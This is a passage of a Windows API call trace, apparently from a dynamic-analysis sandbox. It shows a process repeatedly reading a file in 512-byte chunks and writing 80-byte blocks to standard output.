lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.550] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.550] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] GetFileType (hFile=0x4c) returned 0x1 [0107.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.551] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.551] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.551] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] GetFileType (hFile=0x4c) returned 0x1 [0107.552] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.552] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.552] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.552] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.552] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: 
lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] GetFileType (hFile=0x4c) returned 0x1 [0107.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.553] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.553] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.553] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.554] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] GetFileType (hFile=0x4c) returned 0x1 [0107.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.554] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.554] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.555] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 
[0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] GetFileType (hFile=0x4c) returned 0x1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.555] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] GetFileType (hFile=0x4c) returned 0x1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] GetFileType (hFile=0x4c) returned 0x1 [0107.605] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.605] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0107.606] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.606] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] GetFileType (hFile=0x4c) returned 0x1 [0107.606] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.606] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.607] GetFileType (hFile=0x4c) returned 0x1 [0107.607] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.607] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.607] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.608] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.608] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.608] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | 
